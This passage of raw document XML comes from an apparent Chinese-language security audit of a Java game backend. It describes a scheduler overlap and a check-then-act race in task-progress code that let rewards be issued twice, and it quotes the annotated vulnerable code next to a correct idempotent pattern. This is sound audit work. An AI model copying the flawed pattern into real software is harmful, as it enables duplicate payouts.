          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是否需要登录：否（调度框架自动触发，无 HTTP 入口）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1289"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：系统内部，无需任何外部权限。异常可由数据状态（配置缺失、字段 null 等）自然触发，无需攻击者主动干预</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290"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>PowerScheduler.java.resetExpiredCharging → MinerService.java.recalcUserLevelAndHashRate → MinerService.java.computeBaseTotalHashRate → MinerService.java.getBaseOutputForLevel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audit_m264_1157_resetExpiredCharging_ctrl-path3of8.md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：TaskExecutionService.java#updateProgress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_61" w:id="61"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞60：定时任务重叠执行 + 非每日任务奖励发放缺乏原子幂等保护，导致同一用户任务奖励可被重复发放</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1291"/>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fixedRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 调度器重叠执行 × 非每日任务 TOCTOU 竞态，致任务奖励重复发放</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1292"/>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src/main/java/com/gameBack/mjservice/service/TaskExecutionService.java:updateProgress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1293"/>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 / 幂等缺失</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1294"/>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295"/>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：无需攻击者主动操作（系统内部条件竞争，用户完成交易后系统自动触发）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本漏洞由两个设计缺陷叠加构成，单独存在时危害有限，叠加后可造成任务奖励被重复发放：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>缺陷一：`@Scheduled(fixedRate = ...)` 不等待上次执行完成</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>firstTradeTask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>fixedRate = 10 * 60 * 1000L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（每 10 分钟触发一次）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>fixedRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 语义是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>固定频率</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，即无论上次任务是否执行完毕，到期必然触发新一次执行。当待处理用户数量较多，或 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>coinWService.firstTrade(openId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 外部网络调用出现延迟（每次调用耗时约 1 秒时，600+ 用户即可超过 10 分钟），新一轮调度会与旧一轮并发执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">由于方法开头的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 列表是在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>各自调度轮次启动时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>从数据库查询的：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1296"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>调度 Run-1（T=0 min）查询到用户 A（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>hasTraded=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），开始逐个处理；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1297"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">调度 Run-2（T=10 min）启动，此时 Run-1 尚未处理完用户 A，用户 A 的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>hasTraded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 在数据库中仍为 0，故 Run-2 的查询也包含用户 A；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1298"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Run-1 和 Run-2 均对用户 A 进行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>hasTraded == 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 校验（校验的是各自查询所得的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>内存对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">），均通过，均调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userRepository.save(user)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>hasTraded=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">）和 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>taskExecutionService.updateProgress(user.getId(), "4", 1)</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缺陷二：`updateProgress` 非每日任务分支缺乏事务安全的幂等保护</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>updateProgress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>非每日任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>taskType ≠ 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）采用"读-判-改-写"模式（经典 TOCTOU），且</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>行级悲观锁（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SELECT ... FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）和唯一约束兜底：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读取任务进度记录（无 FOR UPDATE 锁）</w:t>
              <w:br/>
              <w:t>UserTaskRecord userTaskRecord = userTaskRecordRepository.findByUserIdAndTaskId(userId, taskId)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    .orElseGet(() -&gt; { ... });</w:t>
              <w:br/>
              <w:br/>
              <w:t>// 幂等判断：仅检查内存中的 status，两个并发事务均可读到 status &lt; 2</w:t>
              <w:br/>
              <w:t>if (userTaskRecord.getStatus() != null &amp;&amp; userTaskRecord.getStatus() &gt;= 2) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    continue;</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>int newProgress = ... + delta;</w:t>
              <w:br/>
              <w:t>userTaskRecord.setCurrentProgress(newProgress);</w:t>
              <w:br/>
              <w:br/>
              <w:t>if (newProgress &gt;= targetProgress) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userTaskRecord.setStatus(2);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userTaskRecord.setCompleteTime(LocalDateTime.now());</w:t>
              <w:br/>
              <w:t xml:space="preserve">    applyReward(userId, task.getId());  // ← 两个并发事务均执行到此处，奖励被发放两次</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>userTaskRecordRepository.save(userTaskRecord);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>对比</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>每日任务分支</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>taskType=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">）——该分支的开发者已明确意识到幂等问题，使用了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>DailyTaskAwardIssued</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 表的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>唯一约束 + 捕获 `DataIntegrityViolationException`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的正确幂等模式：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每日任务分支（已有正确幂等保护）</w:t>
              <w:br/>
              <w:t>try {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    dailyTaskAwardIssuedRepository.save(new DailyTaskAwardIssued(userId, taskId, today));</w:t>
              <w:br/>
              <w:t xml:space="preserve">    applyReward(userId, task.getId()); // 唯一约束保证只有一个事务能进入</w:t>
              <w:br/>
              <w:t>} catch (DataIntegrityViolationException e) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // 并发时重复插入，其他事务已发奖，忽略</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非每日任务分支完全缺失此等价保护</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，两条并发事务均可通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>status &lt; 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 判断并调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>applyReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，导致任务完成奖励（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>rewardValue: BigDecimal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 类型，结合系统中 USDT 奖励上下文）被重复发放。</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数据流路径：</w:t>
              <w:br/>
              <w:t>数据库用户表（hasTraded=0）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ↓</w:t>
              <w:br/>
              <w:t>firstTradeTask（@Scheduled fixedRate=10min，不等待上次完成）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ↓ 两个并发 Run 均查询到同一用户（hasTraded=0）</w:t>
              <w:br/>
              <w:t>user.getHasTraded() == 0 判断（基于内存对象，非原子 DB 读）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ↓ 两个 Run 均通过判断</w:t>
              <w:br/>
              <w:t>taskExecutionService.updateProgress(user.getId(), "4", 1)  ← 被调用两次</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ↓</w:t>
              <w:br/>
              <w:t>非每日任务分支：findByUserIdAndTaskId（无 FOR UPDATE）← 两事务并发读，均见 status &lt; 2</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ↓</w:t>
              <w:br/>
              <w:t>applyReward(userId, task.getId())  ← 被执行两次</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ↓</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>rewardApplyService.apply(userId, rewardType, rewardValue, minerLevel)  ← 奖励发放两次</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调度器入口：UserScheduler.java</w:t>
              <w:br/>
              <w:t>@Scheduled(fixedRate = 10 * 60 * 1000L)  // ← fixedRate：不等待上次完成，并发叠加触发点</w:t>
              <w:br/>
              <w:t>public void firstTradeTask() {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    var users = userRepository.findByHasTradedAndIsNewUserAndOpenIdIsNotNull(0, 0); // ← 两次并发Run均能查到同一批 hasTraded=0 的用户</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for (User user : users) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">        boolean traded = coinWService.firstTrade(openId); // ← 外部网络调用，可能耗时导致10min超时重叠</w:t>
              <w:br/>
              <w:t xml:space="preserve">        Integer hasTraded = user.getHasTraded();          // ← 读的是本次查询缓存在内存中的值，非原子</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if (traded &amp;&amp; hasTraded == 0) {                   // ← 两个并发Run的内存对象均为0，均通过</w:t>
              <w:br/>
              <w:t xml:space="preserve">            user.setHasTraded(1);</w:t>
              <w:br/>
              <w:t xml:space="preserve">            userRepository.save(user);                    // ← 两个Run均执行save，后一次覆盖前一次，均成功</w:t>
              <w:br/>
              <w:t xml:space="preserve">            taskExecutionService.updateProgress(user.getId(), "4", 1); // ← 同一用户被updateProgress调用两次</w:t>
              <w:br/>
              <w:t xml:space="preserve">            ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② 任务进度更新：TaskExecutionService.java</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public void updateProgress(Long userId, String triggerCondition, int delta) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for (TaskConfig task : tasks) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">        // ========== 非每日任务分支（taskType≠1）==========</w:t>
              <w:br/>
              <w:t xml:space="preserve">        UserTaskRecord userTaskRecord = userTaskRecordRepository.findByUserIdAndTaskId(userId, taskId)</w:t>
              <w:br/>
              <w:t xml:space="preserve">                .orElseGet(() -&gt; { ... return userTaskRecordRepository.save(r); }); // ← 无 SELECT FOR UPDATE，两并发事务均读到 status&lt;2</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">        if (userTaskRecord.getStatus() != null &amp;&amp; userTaskRecord.getStatus() &gt;= 2) { // ← 两事务均通过此判断（均见 status=1 或 null）</w:t>
              <w:br/>
              <w:t xml:space="preserve">            continue;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">        int newProgress = ... + delta;</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">        userTaskRecord.se</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>tCurrentProgress(newProgress);</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">        if (newProgress &gt;= targetProgress) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            userTaskRecord.setStatus(2);</w:t>
              <w:br/>
              <w:t xml:space="preserve">            userTaskRecord.setCompleteTime(LocalDateTime.now());</w:t>
              <w:br/>
              <w:t xml:space="preserve">            applyReward(userId, task.getId()); // ← 漏洞点：两个并发事务均执行到此，奖励双倍发放</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:t xml:space="preserve">        userTaskRecordRepository.save(userTaskRecord);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ 奖励发放：TaskExecutionService.java</w:t>
              <w:br/>
              <w:t>private void applyReward(Long userId, Long taskId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    List&lt;TaskRewardConfig&gt; rewardList = taskRewardConfigRepository.findByTaskIdOrderBySortOrderAsc(taskId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (rewardList.isEmpty()) return;</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    for (TaskRewardConfig reward : rewardList) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        rewardApplyService.apply(userId,</w:t>
              <w:br/>
              <w:t xml:space="preserve">            reward.getRewardType(),</w:t>
              <w:br/>
              <w:t xml:space="preserve">            reward.getRewardValue(),  // ← BigDecimal 奖励金额，被重复发放</w:t>
              <w:br/>
